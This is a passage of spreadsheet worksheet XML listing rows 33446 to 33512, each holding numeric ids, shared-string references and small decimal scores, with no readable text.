    <row r="33446" ht="15.75" customHeight="1">
      <c r="A33446" s="1">
        <v>21172.0</v>
      </c>
      <c r="B33446" s="2">
        <v>1.903584E7</v>
      </c>
      <c r="C33446" s="2" t="s">
        <v>32191</v>
      </c>
      <c r="D33446" s="2">
        <v>1.0</v>
      </c>
      <c r="E33446" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33446" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33447" ht="15.75" customHeight="1">
      <c r="A33447" s="1">
        <v>22251.0</v>
      </c>
      <c r="B33447" s="2">
        <v>3.2786682E7</v>
      </c>
      <c r="C33447" s="2" t="s">
        <v>32192</v>
      </c>
      <c r="D33447" s="2">
        <v>1.0</v>
      </c>
      <c r="E33447" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33447" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33448" ht="15.75" customHeight="1">
      <c r="A33448" s="1">
        <v>22914.0</v>
      </c>
      <c r="B33448" s="2">
        <v>4.8302538E7</v>
      </c>
      <c r="C33448" s="2" t="s">
        <v>32193</v>
      </c>
      <c r="D33448" s="2">
        <v>1.0</v>
      </c>
      <c r="E33448" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33448" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33449" ht="15.75" customHeight="1">
      <c r="A33449" s="1">
        <v>22999.0</v>
      </c>
      <c r="B33449" s="2">
        <v>4968678.0</v>
      </c>
      <c r="C33449" s="2" t="s">
        <v>32194</v>
      </c>
      <c r="D33449" s="2">
        <v>1.0</v>
      </c>
      <c r="E33449" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33449" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33450" ht="15.75" customHeight="1">
      <c r="A33450" s="1">
        <v>23068.0</v>
      </c>
      <c r="B33450" s="2">
        <v>5.0471377E7</v>
      </c>
      <c r="C33450" s="2" t="s">
        <v>32195</v>
      </c>
      <c r="D33450" s="2">
        <v>1.0</v>
      </c>
      <c r="E33450" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33450" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33451" ht="15.75" customHeight="1">
      <c r="A33451" s="1">
        <v>24275.0</v>
      </c>
      <c r="B33451" s="2">
        <v>1.0531217E7</v>
      </c>
      <c r="C33451" s="2" t="s">
        <v>32196</v>
      </c>
      <c r="D33451" s="2">
        <v>1.0</v>
      </c>
      <c r="E33451" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33451" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33452" ht="15.75" customHeight="1">
      <c r="A33452" s="1">
        <v>24363.0</v>
      </c>
      <c r="B33452" s="2">
        <v>1.0739806E7</v>
      </c>
      <c r="C33452" s="2" t="s">
        <v>32197</v>
      </c>
      <c r="D33452" s="2">
        <v>1.0</v>
      </c>
      <c r="E33452" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33452" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33453" ht="15.75" customHeight="1">
      <c r="A33453" s="1">
        <v>24971.0</v>
      </c>
      <c r="B33453" s="2">
        <v>1.264251E7</v>
      </c>
      <c r="C33453" s="2" t="s">
        <v>32198</v>
      </c>
      <c r="D33453" s="2">
        <v>1.0</v>
      </c>
      <c r="E33453" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33453" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33454" ht="15.75" customHeight="1">
      <c r="A33454" s="1">
        <v>25445.0</v>
      </c>
      <c r="B33454" s="2">
        <v>1.3901975E7</v>
      </c>
      <c r="C33454" s="2" t="s">
        <v>32199</v>
      </c>
      <c r="D33454" s="2">
        <v>1.0</v>
      </c>
      <c r="E33454" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33454" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33455" ht="15.75" customHeight="1">
      <c r="A33455" s="1">
        <v>25722.0</v>
      </c>
      <c r="B33455" s="2">
        <v>1.4541555E7</v>
      </c>
      <c r="C33455" s="2" t="s">
        <v>32200</v>
      </c>
      <c r="D33455" s="2">
        <v>1.0</v>
      </c>
      <c r="E33455" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33455" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33456" ht="15.75" customHeight="1">
      <c r="A33456" s="1">
        <v>27151.0</v>
      </c>
      <c r="B33456" s="2">
        <v>2.0781953E7</v>
      </c>
      <c r="C33456" s="2" t="s">
        <v>32201</v>
      </c>
      <c r="D33456" s="2">
        <v>1.0</v>
      </c>
      <c r="E33456" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33456" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33457" ht="15.75" customHeight="1">
      <c r="A33457" s="1">
        <v>27591.0</v>
      </c>
      <c r="B33457" s="2">
        <v>2.25603E7</v>
      </c>
      <c r="C33457" s="2" t="s">
        <v>32202</v>
      </c>
      <c r="D33457" s="2">
        <v>1.0</v>
      </c>
      <c r="E33457" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33457" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33458" ht="15.75" customHeight="1">
      <c r="A33458" s="1">
        <v>28585.0</v>
      </c>
      <c r="B33458" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C33458" s="2" t="s">
        <v>32203</v>
      </c>
      <c r="D33458" s="2">
        <v>1.0</v>
      </c>
      <c r="E33458" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33458" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33459" ht="15.75" customHeight="1">
      <c r="A33459" s="1">
        <v>30504.0</v>
      </c>
      <c r="B33459" s="2">
        <v>4.0038826E7</v>
      </c>
      <c r="C33459" s="2" t="s">
        <v>32204</v>
      </c>
      <c r="D33459" s="2">
        <v>1.0</v>
      </c>
      <c r="E33459" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33459" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33460" ht="15.75" customHeight="1">
      <c r="A33460" s="1">
        <v>31038.0</v>
      </c>
      <c r="B33460" s="2">
        <v>4.7817785E7</v>
      </c>
      <c r="C33460" s="2" t="s">
        <v>32205</v>
      </c>
      <c r="D33460" s="2">
        <v>1.0</v>
      </c>
      <c r="E33460" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33460" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33461" ht="15.75" customHeight="1">
      <c r="A33461" s="1">
        <v>32363.0</v>
      </c>
      <c r="B33461" s="2">
        <v>5.5948391E7</v>
      </c>
      <c r="C33461" s="2" t="s">
        <v>32206</v>
      </c>
      <c r="D33461" s="2">
        <v>1.0</v>
      </c>
      <c r="E33461" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33461" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33462" ht="15.75" customHeight="1">
      <c r="A33462" s="1">
        <v>34062.0</v>
      </c>
      <c r="B33462" s="2">
        <v>9627478.0</v>
      </c>
      <c r="C33462" s="2" t="s">
        <v>32207</v>
      </c>
      <c r="D33462" s="2">
        <v>1.0</v>
      </c>
      <c r="E33462" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33462" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33463" ht="15.75" customHeight="1">
      <c r="A33463" s="1">
        <v>13932.0</v>
      </c>
      <c r="B33463" s="2">
        <v>3.7105453E7</v>
      </c>
      <c r="C33463" s="2" t="s">
        <v>32208</v>
      </c>
      <c r="D33463" s="2">
        <v>1.0</v>
      </c>
      <c r="E33463" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33463" s="2">
        <v>0.09226190476190474</v>
      </c>
    </row>
    <row r="33464" ht="15.75" customHeight="1">
      <c r="A33464" s="1">
        <v>26229.0</v>
      </c>
      <c r="B33464" s="2">
        <v>1.6279652E7</v>
      </c>
      <c r="C33464" s="2" t="s">
        <v>32209</v>
      </c>
      <c r="D33464" s="2">
        <v>1.0</v>
      </c>
      <c r="E33464" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33464" s="2">
        <v>0.09226190476190474</v>
      </c>
    </row>
    <row r="33465" ht="15.75" customHeight="1">
      <c r="A33465" s="1">
        <v>838.0</v>
      </c>
      <c r="B33465" s="2">
        <v>2.1590148E7</v>
      </c>
      <c r="C33465" s="2" t="s">
        <v>32210</v>
      </c>
      <c r="D33465" s="2">
        <v>1.0</v>
      </c>
      <c r="E33465" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33465" s="2">
        <v>0.09064327485380116</v>
      </c>
    </row>
    <row r="33466" ht="15.75" customHeight="1">
      <c r="A33466" s="1">
        <v>1261.0</v>
      </c>
      <c r="B33466" s="2">
        <v>2.5207648E7</v>
      </c>
      <c r="C33466" s="2" t="s">
        <v>32211</v>
      </c>
      <c r="D33466" s="2">
        <v>1.0</v>
      </c>
      <c r="E33466" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33466" s="2">
        <v>0.09064327485380116</v>
      </c>
    </row>
    <row r="33467" ht="15.75" customHeight="1">
      <c r="A33467" s="1">
        <v>4527.0</v>
      </c>
      <c r="B33467" s="2">
        <v>4.2616392E7</v>
      </c>
      <c r="C33467" s="5" t="s">
        <v>32212</v>
      </c>
      <c r="D33467" s="2">
        <v>1.0</v>
      </c>
      <c r="E33467" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33467" s="2">
        <v>0.09064327485380116</v>
      </c>
    </row>
    <row r="33468" ht="15.75" customHeight="1">
      <c r="A33468" s="1">
        <v>5819.0</v>
      </c>
      <c r="B33468" s="2">
        <v>4.6857661E7</v>
      </c>
      <c r="C33468" s="2" t="s">
        <v>32213</v>
      </c>
      <c r="D33468" s="2">
        <v>1.0</v>
      </c>
      <c r="E33468" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33468" s="2">
        <v>0.09064327485380116</v>
      </c>
    </row>
    <row r="33469" ht="15.75" customHeight="1">
      <c r="A33469" s="1">
        <v>16478.0</v>
      </c>
      <c r="B33469" s="2">
        <v>4.6510709E7</v>
      </c>
      <c r="C33469" s="2" t="s">
        <v>32214</v>
      </c>
      <c r="D33469" s="2">
        <v>1.0</v>
      </c>
      <c r="E33469" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33469" s="2">
        <v>0.09064327485380116</v>
      </c>
    </row>
    <row r="33470" ht="15.75" customHeight="1">
      <c r="A33470" s="1">
        <v>17997.0</v>
      </c>
      <c r="B33470" s="2">
        <v>5.1411279E7</v>
      </c>
      <c r="C33470" s="2" t="s">
        <v>32215</v>
      </c>
      <c r="D33470" s="2">
        <v>1.0</v>
      </c>
      <c r="E33470" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33470" s="2">
        <v>0.09064327485380116</v>
      </c>
    </row>
    <row r="33471" ht="15.75" customHeight="1">
      <c r="A33471" s="1">
        <v>19696.0</v>
      </c>
      <c r="B33471" s="2">
        <v>5.6487701E7</v>
      </c>
      <c r="C33471" s="2" t="s">
        <v>32216</v>
      </c>
      <c r="D33471" s="2">
        <v>1.0</v>
      </c>
      <c r="E33471" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33471" s="2">
        <v>0.09064327485380116</v>
      </c>
    </row>
    <row r="33472" ht="15.75" customHeight="1">
      <c r="A33472" s="1">
        <v>6679.0</v>
      </c>
      <c r="B33472" s="2">
        <v>4.9166488E7</v>
      </c>
      <c r="C33472" s="2" t="s">
        <v>32217</v>
      </c>
      <c r="D33472" s="2">
        <v>1.0</v>
      </c>
      <c r="E33472" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33472" s="2">
        <v>0.09064327485380115</v>
      </c>
    </row>
    <row r="33473" ht="15.75" customHeight="1">
      <c r="A33473" s="1">
        <v>22237.0</v>
      </c>
      <c r="B33473" s="2">
        <v>3.2525647E7</v>
      </c>
      <c r="C33473" s="2" t="s">
        <v>32218</v>
      </c>
      <c r="D33473" s="2">
        <v>1.0</v>
      </c>
      <c r="E33473" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33473" s="2">
        <v>0.09064327485380115</v>
      </c>
    </row>
    <row r="33474" ht="15.75" customHeight="1">
      <c r="A33474" s="1">
        <v>16532.0</v>
      </c>
      <c r="B33474" s="2">
        <v>4.6710179E7</v>
      </c>
      <c r="C33474" s="2" t="s">
        <v>32219</v>
      </c>
      <c r="D33474" s="2">
        <v>1.0</v>
      </c>
      <c r="E33474" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33474" s="2">
        <v>0.09041394335511982</v>
      </c>
    </row>
    <row r="33475" ht="15.75" customHeight="1">
      <c r="A33475" s="1">
        <v>19091.0</v>
      </c>
      <c r="B33475" s="2">
        <v>5.4663909E7</v>
      </c>
      <c r="C33475" s="2" t="s">
        <v>32220</v>
      </c>
      <c r="D33475" s="2">
        <v>1.0</v>
      </c>
      <c r="E33475" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33475" s="2">
        <v>0.09041394335511982</v>
      </c>
    </row>
    <row r="33476" ht="15.75" customHeight="1">
      <c r="A33476" s="1">
        <v>13975.0</v>
      </c>
      <c r="B33476" s="2">
        <v>3.7341254E7</v>
      </c>
      <c r="C33476" s="2" t="s">
        <v>32221</v>
      </c>
      <c r="D33476" s="2">
        <v>1.0</v>
      </c>
      <c r="E33476" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33476" s="2">
        <v>0.08908045977011494</v>
      </c>
    </row>
    <row r="33477" ht="15.75" customHeight="1">
      <c r="A33477" s="1">
        <v>19.0</v>
      </c>
      <c r="B33477" s="2">
        <v>1.0448447E7</v>
      </c>
      <c r="C33477" s="2" t="s">
        <v>32222</v>
      </c>
      <c r="D33477" s="2">
        <v>1.0</v>
      </c>
      <c r="E33477" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33477" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33478" ht="15.75" customHeight="1">
      <c r="A33478" s="1">
        <v>26.0</v>
      </c>
      <c r="B33478" s="2">
        <v>1.0517724E7</v>
      </c>
      <c r="C33478" s="2" t="s">
        <v>32223</v>
      </c>
      <c r="D33478" s="2">
        <v>1.0</v>
      </c>
      <c r="E33478" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33478" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33479" ht="15.75" customHeight="1">
      <c r="A33479" s="1">
        <v>44.0</v>
      </c>
      <c r="B33479" s="2">
        <v>1.0763334E7</v>
      </c>
      <c r="C33479" s="2" t="s">
        <v>32224</v>
      </c>
      <c r="D33479" s="2">
        <v>1.0</v>
      </c>
      <c r="E33479" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33479" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33480" ht="15.75" customHeight="1">
      <c r="A33480" s="1">
        <v>52.0</v>
      </c>
      <c r="B33480" s="2">
        <v>1.0943494E7</v>
      </c>
      <c r="C33480" s="2" t="s">
        <v>32225</v>
      </c>
      <c r="D33480" s="2">
        <v>1.0</v>
      </c>
      <c r="E33480" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33480" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33481" ht="15.75" customHeight="1">
      <c r="A33481" s="1">
        <v>57.0</v>
      </c>
      <c r="B33481" s="2">
        <v>1.106775E7</v>
      </c>
      <c r="C33481" s="2" t="s">
        <v>32226</v>
      </c>
      <c r="D33481" s="2">
        <v>1.0</v>
      </c>
      <c r="E33481" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33481" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33482" ht="15.75" customHeight="1">
      <c r="A33482" s="1">
        <v>91.0</v>
      </c>
      <c r="B33482" s="2">
        <v>1.2093057E7</v>
      </c>
      <c r="C33482" s="2" t="s">
        <v>32227</v>
      </c>
      <c r="D33482" s="2">
        <v>1.0</v>
      </c>
      <c r="E33482" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33482" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33483" ht="15.75" customHeight="1">
      <c r="A33483" s="1">
        <v>105.0</v>
      </c>
      <c r="B33483" s="2">
        <v>1.2815043E7</v>
      </c>
      <c r="C33483" s="2" t="s">
        <v>32228</v>
      </c>
      <c r="D33483" s="2">
        <v>1.0</v>
      </c>
      <c r="E33483" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33483" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33484" ht="15.75" customHeight="1">
      <c r="A33484" s="1">
        <v>118.0</v>
      </c>
      <c r="B33484" s="2">
        <v>1.2995404E7</v>
      </c>
      <c r="C33484" s="2" t="s">
        <v>32229</v>
      </c>
      <c r="D33484" s="2">
        <v>1.0</v>
      </c>
      <c r="E33484" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33484" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33485" ht="15.75" customHeight="1">
      <c r="A33485" s="1">
        <v>134.0</v>
      </c>
      <c r="B33485" s="2">
        <v>1.3328282E7</v>
      </c>
      <c r="C33485" s="2" t="s">
        <v>32230</v>
      </c>
      <c r="D33485" s="2">
        <v>1.0</v>
      </c>
      <c r="E33485" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33485" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33486" ht="15.75" customHeight="1">
      <c r="A33486" s="1">
        <v>187.0</v>
      </c>
      <c r="B33486" s="2">
        <v>1.4282959E7</v>
      </c>
      <c r="C33486" s="2" t="s">
        <v>32231</v>
      </c>
      <c r="D33486" s="2">
        <v>1.0</v>
      </c>
      <c r="E33486" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33486" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33487" ht="15.75" customHeight="1">
      <c r="A33487" s="1">
        <v>191.0</v>
      </c>
      <c r="B33487" s="2">
        <v>1.4304961E7</v>
      </c>
      <c r="C33487" s="2" t="s">
        <v>32232</v>
      </c>
      <c r="D33487" s="2">
        <v>1.0</v>
      </c>
      <c r="E33487" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33487" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33488" ht="15.75" customHeight="1">
      <c r="A33488" s="1">
        <v>195.0</v>
      </c>
      <c r="B33488" s="2">
        <v>1.4430233E7</v>
      </c>
      <c r="C33488" s="2" t="s">
        <v>32233</v>
      </c>
      <c r="D33488" s="2">
        <v>1.0</v>
      </c>
      <c r="E33488" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33488" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33489" ht="15.75" customHeight="1">
      <c r="A33489" s="1">
        <v>270.0</v>
      </c>
      <c r="B33489" s="2">
        <v>1.5270251E7</v>
      </c>
      <c r="C33489" s="2" t="s">
        <v>32234</v>
      </c>
      <c r="D33489" s="2">
        <v>1.0</v>
      </c>
      <c r="E33489" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33489" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33490" ht="15.75" customHeight="1">
      <c r="A33490" s="1">
        <v>293.0</v>
      </c>
      <c r="B33490" s="2">
        <v>1.5474386E7</v>
      </c>
      <c r="C33490" s="2" t="s">
        <v>32235</v>
      </c>
      <c r="D33490" s="2">
        <v>1.0</v>
      </c>
      <c r="E33490" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33490" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33491" ht="15.75" customHeight="1">
      <c r="A33491" s="1">
        <v>312.0</v>
      </c>
      <c r="B33491" s="2">
        <v>1.5621246E7</v>
      </c>
      <c r="C33491" s="2" t="s">
        <v>32236</v>
      </c>
      <c r="D33491" s="2">
        <v>1.0</v>
      </c>
      <c r="E33491" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33491" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33492" ht="15.75" customHeight="1">
      <c r="A33492" s="1">
        <v>320.0</v>
      </c>
      <c r="B33492" s="2">
        <v>1.5712403E7</v>
      </c>
      <c r="C33492" s="2" t="s">
        <v>32237</v>
      </c>
      <c r="D33492" s="2">
        <v>1.0</v>
      </c>
      <c r="E33492" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33492" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33493" ht="15.75" customHeight="1">
      <c r="A33493" s="1">
        <v>321.0</v>
      </c>
      <c r="B33493" s="2">
        <v>1.5712403E7</v>
      </c>
      <c r="C33493" s="2" t="s">
        <v>32238</v>
      </c>
      <c r="D33493" s="2">
        <v>1.0</v>
      </c>
      <c r="E33493" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33493" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33494" ht="15.75" customHeight="1">
      <c r="A33494" s="1">
        <v>418.0</v>
      </c>
      <c r="B33494" s="2">
        <v>1.6786672E7</v>
      </c>
      <c r="C33494" s="2" t="s">
        <v>32239</v>
      </c>
      <c r="D33494" s="2">
        <v>1.0</v>
      </c>
      <c r="E33494" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33494" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33495" ht="15.75" customHeight="1">
      <c r="A33495" s="1">
        <v>441.0</v>
      </c>
      <c r="B33495" s="2">
        <v>1.7021815E7</v>
      </c>
      <c r="C33495" s="2" t="s">
        <v>32240</v>
      </c>
      <c r="D33495" s="2">
        <v>1.0</v>
      </c>
      <c r="E33495" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33495" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33496" ht="15.75" customHeight="1">
      <c r="A33496" s="1">
        <v>460.0</v>
      </c>
      <c r="B33496" s="2">
        <v>1.7262109E7</v>
      </c>
      <c r="C33496" s="2" t="s">
        <v>32241</v>
      </c>
      <c r="D33496" s="2">
        <v>1.0</v>
      </c>
      <c r="E33496" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33496" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33497" ht="15.75" customHeight="1">
      <c r="A33497" s="1">
        <v>475.0</v>
      </c>
      <c r="B33497" s="2">
        <v>1.7409052E7</v>
      </c>
      <c r="C33497" s="2" t="s">
        <v>32242</v>
      </c>
      <c r="D33497" s="2">
        <v>1.0</v>
      </c>
      <c r="E33497" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33497" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33498" ht="15.75" customHeight="1">
      <c r="A33498" s="1">
        <v>477.0</v>
      </c>
      <c r="B33498" s="2">
        <v>1.742404E7</v>
      </c>
      <c r="C33498" s="2" t="s">
        <v>32243</v>
      </c>
      <c r="D33498" s="2">
        <v>1.0</v>
      </c>
      <c r="E33498" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33498" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33499" ht="15.75" customHeight="1">
      <c r="A33499" s="1">
        <v>495.0</v>
      </c>
      <c r="B33499" s="2">
        <v>1.7734704E7</v>
      </c>
      <c r="C33499" s="2" t="s">
        <v>32225</v>
      </c>
      <c r="D33499" s="2">
        <v>1.0</v>
      </c>
      <c r="E33499" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33499" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33500" ht="15.75" customHeight="1">
      <c r="A33500" s="1">
        <v>501.0</v>
      </c>
      <c r="B33500" s="2">
        <v>1.7994351E7</v>
      </c>
      <c r="C33500" s="2" t="s">
        <v>32244</v>
      </c>
      <c r="D33500" s="2">
        <v>1.0</v>
      </c>
      <c r="E33500" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33500" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33501" ht="15.75" customHeight="1">
      <c r="A33501" s="1">
        <v>528.0</v>
      </c>
      <c r="B33501" s="2">
        <v>1.850251E7</v>
      </c>
      <c r="C33501" s="2" t="s">
        <v>32245</v>
      </c>
      <c r="D33501" s="2">
        <v>1.0</v>
      </c>
      <c r="E33501" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33501" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33502" ht="15.75" customHeight="1">
      <c r="A33502" s="1">
        <v>612.0</v>
      </c>
      <c r="B33502" s="2">
        <v>1.9416919E7</v>
      </c>
      <c r="C33502" s="2" t="s">
        <v>32246</v>
      </c>
      <c r="D33502" s="2">
        <v>1.0</v>
      </c>
      <c r="E33502" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33502" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33503" ht="15.75" customHeight="1">
      <c r="A33503" s="1">
        <v>616.0</v>
      </c>
      <c r="B33503" s="2">
        <v>1.9469825E7</v>
      </c>
      <c r="C33503" s="2" t="s">
        <v>32247</v>
      </c>
      <c r="D33503" s="2">
        <v>1.0</v>
      </c>
      <c r="E33503" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33503" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33504" ht="15.75" customHeight="1">
      <c r="A33504" s="1">
        <v>691.0</v>
      </c>
      <c r="B33504" s="2">
        <v>2.0406611E7</v>
      </c>
      <c r="C33504" s="2" t="s">
        <v>32248</v>
      </c>
      <c r="D33504" s="2">
        <v>1.0</v>
      </c>
      <c r="E33504" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33504" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33505" ht="15.75" customHeight="1">
      <c r="A33505" s="1">
        <v>705.0</v>
      </c>
      <c r="B33505" s="2">
        <v>2.0493226E7</v>
      </c>
      <c r="C33505" s="2" t="s">
        <v>32249</v>
      </c>
      <c r="D33505" s="2">
        <v>1.0</v>
      </c>
      <c r="E33505" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33505" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33506" ht="15.75" customHeight="1">
      <c r="A33506" s="1">
        <v>731.0</v>
      </c>
      <c r="B33506" s="2">
        <v>2.0794796E7</v>
      </c>
      <c r="C33506" s="2" t="s">
        <v>32250</v>
      </c>
      <c r="D33506" s="2">
        <v>1.0</v>
      </c>
      <c r="E33506" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33506" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33507" ht="15.75" customHeight="1">
      <c r="A33507" s="1">
        <v>732.0</v>
      </c>
      <c r="B33507" s="2">
        <v>2.0794796E7</v>
      </c>
      <c r="C33507" s="2" t="s">
        <v>32251</v>
      </c>
      <c r="D33507" s="2">
        <v>1.0</v>
      </c>
      <c r="E33507" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33507" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33508" ht="15.75" customHeight="1">
      <c r="A33508" s="1">
        <v>743.0</v>
      </c>
      <c r="B33508" s="2">
        <v>2.0883867E7</v>
      </c>
      <c r="C33508" s="2" t="s">
        <v>32252</v>
      </c>
      <c r="D33508" s="2">
        <v>1.0</v>
      </c>
      <c r="E33508" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33508" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33509" ht="15.75" customHeight="1">
      <c r="A33509" s="1">
        <v>756.0</v>
      </c>
      <c r="B33509" s="2">
        <v>2.0978524E7</v>
      </c>
      <c r="C33509" s="2" t="s">
        <v>32253</v>
      </c>
      <c r="D33509" s="2">
        <v>1.0</v>
      </c>
      <c r="E33509" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33509" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33510" ht="15.75" customHeight="1">
      <c r="A33510" s="1">
        <v>839.0</v>
      </c>
      <c r="B33510" s="2">
        <v>2.1590148E7</v>
      </c>
      <c r="C33510" s="2" t="s">
        <v>32254</v>
      </c>
      <c r="D33510" s="2">
        <v>1.0</v>
      </c>
      <c r="E33510" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33510" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33511" ht="15.75" customHeight="1">
      <c r="A33511" s="1">
        <v>850.0</v>
      </c>
      <c r="B33511" s="2">
        <v>2.1716426E7</v>
      </c>
      <c r="C33511" s="2" t="s">
        <v>32255</v>
      </c>
      <c r="D33511" s="2">
        <v>1.0</v>
      </c>
      <c r="E33511" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33511" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33512" ht="15.75" customHeight="1">
      <c r="A33512" s="1">
        <v>876.0</v>
      </c>
      <c r="B33512" s="2">
        <v>2.1900915E7</v>
      </c>
      <c r="C33512" s="2" t="s">
        <v>32256</v>
      </c>
      <c r="D33512" s="2">
        <v>1.0</v>
      </c>
      <c r="E33512" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33512" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33513" ht="15.75" customHeight="1">
      <c r="A33513" s="1">
